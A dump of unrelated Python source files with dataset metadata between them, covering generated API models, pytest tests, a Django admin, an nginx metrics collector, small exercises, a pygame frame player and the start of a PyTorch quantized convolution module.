raise ValueError({
'error-string': """state must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__state = t
if hasattr(self, '_set'):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
config = __builtin__.property(_get_config, _set_config)
state = __builtin__.property(_get_state, _set_state)
_pyangbind_elements = {'config': config, 'state': state, }
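# A minimal usage sketch (illustrative only, not part of the generated file;
# the variable name `spf` below is an assumption). The `config`/`state`
# properties defined above route through the getter/setter pairs:
#   spf.config           # invokes _get_config() and returns the YANGDynClass container
#   spf._unset_config()  # replaces config with a fresh, empty container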
| [
"[email protected]"
] | |
609f208316babac07ccff737f84094897e5d863c | 59166105545cdd87626d15bf42e60a9ee1ef2413 | /dbpedia/models/unknown.py | dd1afb9f030bccf6a3766988d89ff96438847c90 | [] | no_license | mosoriob/dbpedia_api_client | 8c594fc115ce75235315e890d55fbf6bd555fa85 | 8d6f0d04a3a30a82ce0e9277e4c9ce00ecd0c0cc | refs/heads/master | 2022-11-20T01:42:33.481024 | 2020-05-12T23:22:54 | 2020-05-12T23:22:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,224 | py | # coding: utf-8
"""
DBpedia
This is the API of the DBpedia Ontology # noqa: E501
The version of the OpenAPI document: v0.0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from dbpedia.configuration import Configuration
class Unknown(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'description': 'list[str]',
'id': 'str',
'label': 'list[str]',
'type': 'list[str]'
}
attribute_map = {
'description': 'description',
'id': 'id',
'label': 'label',
'type': 'type'
}
def __init__(self, description=None, id=None, label=None, type=None, local_vars_configuration=None): # noqa: E501
"""Unknown - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._description = None
self._id = None
self._label = None
self._type = None
self.discriminator = None
self.description = description
if id is not None:
self.id = id
self.label = label
self.type = type
@property
def description(self):
"""Gets the description of this Unknown. # noqa: E501
small description # noqa: E501
:return: The description of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this Unknown.
small description # noqa: E501
:param description: The description of this Unknown. # noqa: E501
:type: list[str]
"""
self._description = description
@property
def id(self):
"""Gets the id of this Unknown. # noqa: E501
identifier # noqa: E501
:return: The id of this Unknown. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Unknown.
identifier # noqa: E501
:param id: The id of this Unknown. # noqa: E501
:type: str
"""
self._id = id
@property
def label(self):
"""Gets the label of this Unknown. # noqa: E501
short description of the resource # noqa: E501
:return: The label of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._label
@label.setter
def label(self, label):
"""Sets the label of this Unknown.
short description of the resource # noqa: E501
:param label: The label of this Unknown. # noqa: E501
:type: list[str]
"""
self._label = label
@property
def type(self):
"""Gets the type of this Unknown. # noqa: E501
type of the resource # noqa: E501
:return: The type of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this Unknown.
type of the resource # noqa: E501
:param type: The type of this Unknown. # noqa: E501
:type: list[str]
"""
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Unknown):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, Unknown):
return True
return self.to_dict() != other.to_dict()
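# A minimal usage sketch (not part of the generated module; the field values
# below are invented for illustration). The model round-trips to plain dicts:
#   unknown = Unknown(id='Q1', label=['example'], type=['owl:Thing'],
#                     description=['an example resource'])
#   unknown.to_dict()  # {'description': [...], 'id': 'Q1', 'label': [...], 'type': [...]}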
| [
"[email protected]"
] | |
9a3dff4505416c7621031482886acde695f4199e | bb00a3876ddb49dcea2cdc4bbd2356359260a563 | /poptimizer/evolve/tests/test_store.py | d20ee06f325caec712a7a86b4cc74674f8863523 | [
"Unlicense"
] | permissive | hraffiest/poptimizer | 1d2975acd0ecbe8466a7a1aa1bf631d12b4c9854 | 16bc9e056a6daa452d48cdac0dea5901e4a3d4a1 | refs/heads/master | 2023-04-21T02:29:06.259420 | 2021-05-05T14:33:03 | 2021-05-05T14:33:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,176 | py | from types import SimpleNamespace
import bson
import pymongo
import pytest
from poptimizer.evolve import store
@pytest.fixture(scope="module", autouse=True)
def set_test_collection():
# noinspection PyProtectedMember
saved_collection = store._COLLECTION
test_collection = saved_collection.database["test"]
store._COLLECTION = test_collection
yield
store._COLLECTION = saved_collection
test_collection.drop()
def test_get_collection():
collection = store.get_collection()
assert isinstance(collection, pymongo.collection.Collection)
assert collection.name == "test"
@pytest.fixture(scope="class", name="field_instance")
def make_field_and_instance():
field = store.BaseField()
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestBaseField:
def test_set_name_index(self):
field = store.BaseField(index=True)
field.__set_name__(SimpleNamespace, "some")
assert field._name == store.ID
def test_set_name(self, field_instance):
field, _ = field_instance
field.__set_name__(SimpleNamespace, "some")
assert field._name == "some"
def test_get_raise(self, field_instance):
field, instance = field_instance
with pytest.raises(AttributeError) as error:
field.__get__(instance, SimpleNamespace)
assert "'SimpleNamespace' object has no attribute 'some'" in str(error.value)
def test_set(self, field_instance):
field, instance = field_instance
field.__set__(instance, 42)
assert hasattr(instance, "some")
assert instance.some == 42
assert len(instance._update) == 1
assert instance._update["some"] == 42
def test_get(self, field_instance):
field, instance = field_instance
assert field.__get__(instance, SimpleNamespace) == 42
@pytest.fixture(scope="class", name="default_field_instance")
def make_default_field_and_instance():
field = store.DefaultField(53)
field.__set_name__(SimpleNamespace, "some")
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestDefaultField:
def test_unset_get(self, default_field_instance):
field, instance = default_field_instance
assert field.__get__(instance, SimpleNamespace) == 53
def test_set_get(self, default_field_instance):
field, instance = default_field_instance
field.__set__(instance, 64)
assert field.__get__(instance, SimpleNamespace) == 64
@pytest.fixture(scope="class", name="genotype_field_instance")
def make_genotype_field_and_instance():
field = store.GenotypeField()
field.__set_name__(SimpleNamespace, "some")
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestGenotypeField:
def test_set_not_genotype(self, genotype_field_instance):
field, instance = genotype_field_instance
field.__set__(instance, None)
rez = field.__get__(instance, SimpleNamespace)
assert isinstance(rez, store.Genotype)
assert isinstance(instance.some, store.Genotype)
assert rez is instance.some
def test_set_genotype(self, genotype_field_instance):
field, instance = genotype_field_instance
genotype = store.Genotype(None)
field.__set__(instance, genotype)
assert genotype is field.__get__(instance, SimpleNamespace)
assert genotype is instance.some
class TestDoc:
def test_new_doc_and_save(self):
assert store.get_collection().count_documents({}) == 0
genotype = store.Genotype()
doc = store.Doc(genotype=genotype)
assert store.get_collection().count_documents({}) == 0
assert len(doc._update) == 2
assert isinstance(doc.id, bson.ObjectId)
assert doc.genotype is genotype
assert doc.wins == 0
assert doc.model is None
with pytest.raises(AttributeError) as error:
isinstance(doc.llh, bson.ObjectId)
assert "object has no attribute 'llh'" in str(error.value)
assert doc.date is None
assert doc.timer == 0
assert doc.tickers is None
doc.save()
assert store.get_collection().count_documents({}) == 1
assert len(doc._update) == 0
def test_load_wrong_doc(self):
id_ = bson.ObjectId()
with pytest.raises(store.IdError) as error:
store.Doc(id_=id_)
assert str(id_) in str(error.value)
def test_load_doc(self):
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
assert len(doc._update) == 0
assert doc.id == db_doc[store.ID]
assert doc.genotype == db_doc["genotype"]
assert doc.wins == 0
assert doc.model is None
with pytest.raises(AttributeError) as error:
isinstance(doc.llh, bson.ObjectId)
assert "object has no attribute 'llh'" in str(error.value)
assert doc.date is None
assert doc.timer == 0
assert doc.tickers is None
def test_load_doc_update_and_save(self):
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
assert len(doc._update) == 0
doc.wins = 42
doc.llh = 2.2
doc.timer = 111
assert len(doc._update) == 3
doc.save()
assert len(doc._update) == 0
doc_loaded = store.Doc(id_=db_doc[store.ID])
assert len(doc_loaded._update) == 0
assert doc_loaded.id == db_doc[store.ID]
assert doc_loaded.genotype == db_doc["genotype"]
assert doc_loaded.wins == 42
assert doc_loaded.model is None
assert doc_loaded.llh == 2.2
assert doc_loaded.date is None
assert doc_loaded.timer == 111
assert doc_loaded.tickers is None
def test_delete(self):
assert store.get_collection().count_documents({}) == 1
db_doc = store.get_collection().find_one()
doc = store.Doc(id_=db_doc[store.ID])
doc.delete()
assert store.get_collection().count_documents({}) == 0
| [
"[email protected]"
] | |
ee7a30ed534036c38ac71e4aa8e959f2c127a862 | 251651b763c2588a0a6b65d8b23d93b195a91788 | /virtual/bin/gunicorn | 0b628ba141f066067c63f04acb73acfb5b4b36dc | [
"MIT"
] | permissive | AugustineOchieng/studio | b0f6feb14f7f3e1f65644bffbee9d2c3fe805c8f | ee7fb55fd2ad7046414a68872af98361719af42b | refs/heads/master | 2020-05-21T08:21:07.033975 | 2019-05-15T10:14:45 | 2019-05-15T10:14:45 | 185,977,336 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | #!/home/moringa/Desktop/studio/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.wsgiapp import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"[email protected]"
] | ||
3f86754056689d08a519f2a79797332c97fa1366 | fcb94b0575d55b246a4e78dfec2610c9aceb836e | /tests/test_code/py/import_paths/abra.py | 046a90a0eb69f363cdbdc9eb6c947ebc79278f71 | [
"LGPL-2.0-or-later",
"MIT"
] | permissive | sarvex/code2flow | 1504fb0537ea17f486013e67958b4e17551f3a02 | 77375b90a09abd4b4d38167737d02ff4737a52aa | refs/heads/main | 2023-06-10T03:24:18.935595 | 2023-05-30T23:52:11 | 2023-05-30T23:52:11 | 33,498,323 | 0 | 0 | MIT | 2023-05-30T23:52:12 | 2015-04-06T18:33:55 | Python | UTF-8 | Python | false | false | 19 | py | def abra2():
pass
| [
"[email protected]"
] | |
6c917765f0811b156ddda90eac4c87e9f06185f7 | f98c9dea0e212be5c7bc3161499e5633383bd4d7 | /python/fruit_package_module_test.py | c82839cdcdd29c508d4f8791380d7717c7237b7c | [
"MIT"
] | permissive | ysoftman/test_code | dddb5bee3420977bfa335320a09d66e5984403f5 | 0bf6307073081eeb1d654a1eb5efde44a0bdfe1e | refs/heads/master | 2023-08-17T05:45:49.716829 | 2023-08-16T05:00:09 | 2023-08-16T05:00:09 | 108,200,568 | 4 | 0 | MIT | 2023-03-15T04:23:10 | 2017-10-25T00:49:26 | C++ | UTF-8 | Python | false | false | 509 | py | # Case where a plain module (not a package, i.e. a directory of modules) sits on the same path
# import fruite_module as fm
# Using package.module through an alias
import fruite_package.fruit_module as fm
fm.fruit.apple(100)
fm.fruit.lemon("2000")
# Importing everything from package.module
from fruite_package.fruit_module import *
fruit.apple(100)
# Use the fruit class from package.module under the name fr
from fruite_package.fruit_module import fruit as fr
fr.lemon(200)
fr.apple(50)
fr.orange(100)
| [
"[email protected]"
] | |
22cff3945dd868a9c060382d1020722c7a4d2eea | 4a08ae605a8f96146b14881330d21317a67e225d | /data_types/question17.py | a245b912a288e46b12cce2f9783bf7dbe0c76b56 | [] | no_license | alex1the1great/Assignment | dd6083a2196d9bae36bb66bf12a2bdc07a0b93e8 | 5a806668c3bfc0d9750421c4ae287f19cbf36fc7 | refs/heads/master | 2022-11-13T11:07:13.875607 | 2020-06-29T03:51:17 | 2020-06-29T03:51:17 | 275,724,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 361 | py | import re
print('Example: 1 2 3 4 5')
numbers = input('Enter list of numbers separate with space:')
pattern = r'^[0-9\s]+$'
check_multi = re.findall(pattern, numbers)
if not check_multi:
print('Please enter valid format')
else:
    total = numbers.split()  # split() (not split(' ')) so repeated or stray spaces do not produce empty strings
product = 1
for i in total:
i = int(i)
product *= i
print(product)
| [
"[email protected]"
] | |
06c23408811bd37ee1ea076d37ef63244b96f858 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_155/945.py | a43e4458d2b1f38b912356b2ce0d2242713cfb2c | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 647 | py | def nombre_ami(b):
    # Code Jam "Standing Ovation": b[i] is the number of audience members with
    # shyness level i; count the friends (shyness 0) we must invite so that
    # everybody eventually stands.
    debout = 0       # people standing so far
    ami = 0          # friends invited
    compteur = 0     # current shyness level
    ami_en_plus = 0
    for chiffre in b:
        # If fewer people stand than this shyness level requires,
        # invite just enough friends to close the gap.
        if compteur > debout:
            ami_en_plus = (compteur - debout)
            ami += ami_en_plus
            debout += ami_en_plus
        debout += int(chiffre)
        compteur += 1
    return str(ami)
def solution_jam1():
    # Read "T" on the first line, then one "Smax shyness-string" pair per case
    source = open("D:/Download/test.txt","r")
output = open("D:/Download/jam1long.txt","w")
liste = source.readline()
liste = liste.split('\n')
for i in range(int(liste[0])):
liste = source.readline()
liste = liste.split()
output.write('Case #'+str(i+1)+': '+nombre_ami(liste[1])+'\n')
output.close()
source.close()
solution_jam1()
| [
"[email protected]"
] | |
e00d864ccd59cb04d2832d0d8da60884622e3044 | b2de5660d81afdf6b1fba058faee6ece6a51e462 | /amplify/agent/collectors/plus/upstream.py | ebd305b92eb648c9fd3ca9fc2b1bc0b84eb905e5 | [
"BSD-2-Clause"
] | permissive | Ferrisbane/nginx-amplify-agent | 725d8a7da7fb66e0b41cddd8139d25a084570592 | ef769934341374d4b6ede5fcf5ebff34f6cba8de | refs/heads/master | 2021-01-22T00:03:49.686169 | 2016-07-20T17:50:30 | 2016-07-20T17:50:30 | 63,801,713 | 0 | 0 | null | 2016-07-20T17:41:25 | 2016-07-20T17:41:25 | null | UTF-8 | Python | false | false | 3,982 | py | # -*- coding: utf-8 -*-
from amplify.agent.collectors.plus.util import upstream
from amplify.agent.common.context import context
from amplify.agent.collectors.plus.abstract import PlusStatusCollector
__author__ = "Grant Hulegaard"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__credits__ = ["Mike Belov", "Andrei Belov", "Ivan Poluyanov", "Oleg Mamontov", "Andrew Alexeev", "Grant Hulegaard", "Arie van Luttikhuizen"]
__license__ = ""
__maintainer__ = "Grant Hulegaard"
__email__ = "[email protected]"
class UpstreamCollector(PlusStatusCollector):
short_name = 'plus_upstream'
def collect(self):
try:
tuples = self.gather_data()
for data, stamp in tuples:
# workaround for supporting old N+ format
# http://nginx.org/en/docs/http/ngx_http_status_module.html#compatibility
peers = data['peers'] if 'peers' in data else data
for peer in peers:
# This loop will aggregate all peer metrics as a single "upstream" entity.
for method in (
self.active_connections,
self.upstream_request,
self.upstream_header_time,
self.upstream_response_time,
self.upstream_responses,
self.upstream_bytes,
self.upstream_fails,
self.upstream_health_checks,
self.upstream_queue,
self.upstream_peer_count
):
try:
method(peer, stamp)
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to collect n+ upstream peer metrics %s due to %s' %
(method.__name__, exception_name)
)
context.log.debug('additional info:', exc_info=True)
try:
self.increment_counters()
self.finalize_latest()
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to increment n+ upstream counters due to %s' %
exception_name
)
context.log.debug('additional info:', exc_info=True)
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to collect n+ upstream metrics due to %s' %
exception_name
)
context.log.debug('additional info:', exc_info=True)
def active_connections(self, data, stamp):
upstream.collect_active_connections(self, data, stamp)
def upstream_request(self, data, stamp):
upstream.collect_upstream_request(self, data, stamp)
def upstream_header_time(self, data, stamp):
upstream.collect_upstream_header_time(self, data, stamp)
def upstream_response_time(self, data, stamp):
upstream.collect_upstream_response_time(self, data, stamp)
def upstream_responses(self, data, stamp):
upstream.collect_upstream_responses(self, data, stamp)
def upstream_bytes(self, data, stamp):
upstream.collect_upstream_bytes(self, data, stamp)
def upstream_fails(self, data, stamp):
upstream.collect_upstream_fails(self, data, stamp)
def upstream_health_checks(self, data, stamp):
upstream.collect_upstream_health_checks(self, data, stamp)
def upstream_queue(self, data, stamp):
upstream.collect_upstream_queue(self, data, stamp)
def upstream_peer_count(self, data, stamp):
upstream.collect_upstream_peer_count(self, data, stamp)
| [
"[email protected]"
] | |
b4cff199f29e741f20b31e5e5f92df6fd15d82ab | d200a54adcec3a254a909b9689f925c1614f6fb1 | /backend/core/admin.py | a526227756b4d1de8a88c8269f99a134351a5779 | [] | no_license | shusaku-ishikawa/binance | 1bbe7f4aaf32c0ade4f67da7a4c1972f414bfa19 | 60bad0848fa4f4666e2476117a79ee8452326ed1 | refs/heads/master | 2022-01-27T01:35:24.038917 | 2019-11-30T12:42:36 | 2019-11-30T12:42:36 | 204,909,653 | 0 | 1 | null | 2022-01-15T05:20:54 | 2019-08-28T10:50:13 | JavaScript | UTF-8 | Python | false | false | 2,304 | py | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
from .models import *
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
from django.conf import settings
from django.utils.safestring import mark_safe
class MyUserChangeForm(UserChangeForm):
class Meta:
model = User
fields = '__all__'
class MyUserCreationForm(UserCreationForm):
class Meta:
model = User
fields = ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb' )
class MyUserAdmin(UserAdmin):
fieldsets = (
(None, {'fields': ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password')}),
(_('Personal info'), {'fields': ()}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}),
(_('Important dates'), {'fields': ('last_login',)}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email','api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password1', 'password2'),
}),
)
form = MyUserChangeForm
add_form = MyUserCreationForm
list_display = ('email', 'api_key','api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'is_staff',)
search_fields = ('email',)
ordering = ('email',)
class SymbolAdmin(admin.ModelAdmin):
#list_display = [field.name for field in Symbol._meta.get_fields()]
list_display = ['symbol', 'from_currency', 'to_currency', 'side']
class OrderSequenceAdmin(admin.ModelAdmin):
list_display = ['t1', 't2', 't3']
class OrderAdmin(admin.ModelAdmin):
list_display = ['symbol', 'order_id', 'quantity', 'quote_quantity', 'price', 'time', 'status']
class OrderSequenceResultAdmin(admin.ModelAdmin):
list_display = ['master', 't1_result', 't2_result', 't3_result', 'profit']
admin.site.register(User, MyUserAdmin)
admin.site.register(Symbol, SymbolAdmin)
admin.site.register(OrderSequence, OrderSequenceAdmin)
admin.site.register(Order, OrderAdmin)
admin.site.register(OrderSequenceResult, OrderSequenceResultAdmin) | [
"[email protected]"
] | |
4d5c0786be25e6910e4ce018e76c712744d39dae | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/74/usersdata/197/40006/submittedfiles/lecker.py | 2e27da6fdd494d21fc5e283193a357ccb803379a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | # -*- coding: utf-8 -*-
import math
a=int(input('Enter the value of number a:'))
b=int(input('Enter the value of number b:'))
c=int(input('Enter the value of number c:'))
d=int(input('Enter the value of number d:'))
if a>b and b<c and c>d:
print('N')
elif a==b==c==d:
print('N')
elif a<b and b>c and c<d:
print('N')
elif a>b and b<c and c<d:
print('N')
elif (a==b==c>=d) or (a<b==c==d) or (a==b<c==d):  # plateau patterns are alternatives, not simultaneous conditions
print('N')
else:
print('S') | [
"[email protected]"
] | |
a85eca58f0c19dea7674254798bcf77bb60ed9b8 | a882ccf759025735f926695d6a5a39937854646a | /e_step4/pygame00.py | a91f3f96979ff338f83cd1d55dc042ebde65d456 | [] | no_license | muzudho/practice-open-cv2 | 5c1534564bcf43c2d8f7a6fb4ee1583bd77337f9 | 55af5cfb37587b08123b404cf8768d83148cb046 | refs/heads/main | 2023-07-08T02:23:22.984816 | 2021-08-10T10:45:01 | 2021-08-10T10:45:01 | 349,864,518 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,820 | py | """coding: utf -8
"""
# Load modules
import sys
import time
import pygame
from pygame.locals import QUIT
# Initialize pygame
pygame.init()
# Load the images
# FRAME_COUNT = 380
FRAME_COUNT = 528
#FRAME_COUNT = 960
# FRAME_COUNT = 4560
#FRAME_COUNT = 1520
FPS = 8  # e.g. when recording at 15 frames, the game screen shows no noticeable frame drops at about half that FPS
IMAGE1 = pygame.image.load('./@share/out-cstep4-0.png')
IMAGE1_W = IMAGE1.get_width()  # get the image width
IMAGE1_H = IMAGE1.get_height()  # get the image height
DISPLAY_SIZE = (IMAGE1_W, IMAGE1_H)  # width, height
SURFACE = pygame.display.set_mode(DISPLAY_SIZE)  # application window
pygame.display.set_caption('Application: pygame00.py')
CLOCK = pygame.time.Clock()  # Clock object for frame-rate control
# Preload the images
FRAMES = []
for i in range(0, FRAME_COUNT):
    IMAGE1 = pygame.image.load(f'./@share/out-cstep4-{i}.png')
    FRAMES.append(IMAGE1)
# Main loop
WHITE = (255, 255, 255)
TOP_LEFT_P = (0, 0)  # x, y
for j in range(0, 1):  # 1 loop  # 2 loops
    for i in range(0, FRAME_COUNT):
        # SURFACE.fill(WHITE)  # background color
        SURFACE.blit(FRAMES[i], TOP_LEFT_P)  # draw the frame
        # Loop that processes the event queue
        for ev in pygame.event.get():
            if ev.type == QUIT:  # the "quit" event
                pygame.quit()
                print('quitting...')
                sys.exit()
        # Update the display
        pygame.display.update()
        if j == 0 and i == 0:
            time.sleep(3)  # Seconds
        # Set the frame rate
        CLOCK.tick(FPS)  # specify the fps
time.sleep(3) # Seconds
| [
"[email protected]"
] | |
b85a75aeafda4547a9db1b598e1d8f93af10c136 | 3b628230666e2324b325d29ed8997a905dcba291 | /web/views/report.py | 17aff5f6356ae5632f81eedc4114595ae36f8fbe | [] | no_license | emohamed/obshtestvo.bg | 9f67734776ecdef5dfc5238a9caabd97c5e80cbd | b90c547a880294cc84956eb926413fb7118be133 | refs/heads/master | 2020-12-25T20:30:38.667603 | 2016-01-06T16:44:33 | 2016-01-06T16:46:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py | from django.views.generic.base import View
from restful.decorators import restful_view_templates
@restful_view_templates
class ReportView(View):
def get(self, request):
return {
"page": "inner report",
}
| [
"[email protected]"
] | |
77bf3568089d84dca57ebccf21f5df9caf089b6b | c1a9436f38714277b063d76af47e8b9448d5cc73 | /CRO/Molecule.py | 25eaa41d932d1644507e279a2297edc8bc7924ea | [] | no_license | rakib06/LearnPythonBasic | 83f5bf5c63a40e8d5f93ac3ffa0d0443fdc0519a | fc0b81850e76d38c6816bd9fe81b442b68d6bd75 | refs/heads/master | 2020-09-01T01:03:49.087763 | 2019-12-25T23:11:09 | 2019-12-25T23:11:09 | 218,835,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | def spin_words(sentence):
my_list = sentence.split()
result = ''
for i in range(len(my_list)):
x = my_list[i]
if len(x) >= 5:
x = x[::-1]
if i != 0:
result = result + ' ' + x
else:
result += x
return result
s = 'rettel rettel Kata than in etirW than desrever the in gnirts gnirts'
def spin_word_kata(sentence):
return " ".join([x[::-1] if len(x)>=5 else x for x in sentence.split()])
print(spin_word_kata(s))
my_list = ['hello', 'how', 'are', 'you']
print(' '.join(my_list), end='\n')
print(' '.join([x[::-1] if x != 'you' else x for x in my_list])) | [
"[email protected]"
] | |
02c2c129135e6b8b655b6a7764566dd3e703f0b2 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_13280.py | 2846b517a21df83a34ad11137da1ded0a3e9d792 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 89 | py | # Django: Formset for adding captions to uploaded images
{{ form.instance.resized_img }}
| [
"[email protected]"
] | |
f19ffd2d0507b157f08f52ba3d59cf3a0d343ef3 | ca59d18e503ef22fbc920c6de48ffc8eac5a1443 | /tools/pytorch-quantization/pytorch_quantization/nn/modules/quant_conv.py | 9aaf19a265cb987212f13e71af3c256ce3cfe589 | [
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"ISC",
"MIT"
] | permissive | boh-inspur/TensorRT | 9fc0ae0ad4e31da040d10728b63d9dc284852b67 | e4d2f7f4406f1c8f4632cc67de33728cef90ca29 | refs/heads/master | 2023-04-13T21:24:13.912673 | 2021-04-23T09:55:18 | 2021-04-23T09:55:18 | 265,431,588 | 0 | 0 | Apache-2.0 | 2021-04-23T09:55:19 | 2020-05-20T02:49:58 | null | UTF-8 | Python | false | false | 16,356 | py | #
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Quantized convolution
Base code is from nn.Conv; details of the modules and their original arguments can be found there.
Module names are intentionally kept the same as in the unquantized version so that the quantized modules can be
dropped into a preexisting model easily and load pretrained weights. Aliases with the Quant prefix are defined and
are encouraged to be used explicitly when starting from scratch.
"""
import torch
import torch.nn
import torch.nn.functional as F
from torch.nn.modules.utils import _single, _pair, _triple
from torch.nn.modules.conv import _ConvTransposeNd
from pytorch_quantization import tensor_quant
from . import _utils
__all__ = [
"Conv2d", "QuantConv2d", "Conv3d", "QuantConv3d", "Conv1d", "QuantConv1d", "ConvTranspose1d", "ConvTranspose2d",
"ConvTranspose3d", "QuantConvTranspose1d", "QuantConvTranspose2d", "QuantConvTranspose3d"
]
class _QuantConvNd(torch.nn.modules.conv._ConvNd, _utils.QuantMixin):
"""base class of quantized Conv inherited from _ConvNd
Comments of original arguments can be found in torch.nn.modules.conv
Arguments:
quant_desc_input: An instance of :class:`QuantDescriptor <pytorch_quantization.tensor_quant.QuantDescriptor>`.
Quantization descriptor of input.
quant_desc_weight: An instance of :class:`QuantDescriptor <pytorch_quantization.tensor_quant.QuantDescriptor>`.
Quantization descriptor of weight.
Raises:
ValueError: If unsupported arguments are passed in.
Readonly properties:
- input_quantizer:
- weight_quantizer:
Static methods:
- set_default_quant_desc_input: Set default_quant_desc_input
- set_default_quant_desc_weight: Set default_quant_desc_weight
"""
default_quant_desc_input = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
def __init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, transposed, output_padding,
groups, bias, padding_mode, quant_desc_input, quant_desc_weight):
super(_QuantConvNd, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation,
transposed, output_padding, groups, bias, padding_mode)
self.init_quantizer(quant_desc_input, quant_desc_weight)
def _quant(self, input):
"""Apply quantization on input and weight
        Helper called by the classes lower in the hierarchy; it performs the quantization of input and weight
        before the forward pass of the derived class runs.
Arguments:
input: in_features to quantize
Returns:
A tuple: (quant_in_feature, quant_weight)
"""
quant_input = self._input_quantizer(input)
quant_weight = self._weight_quantizer(self.weight)
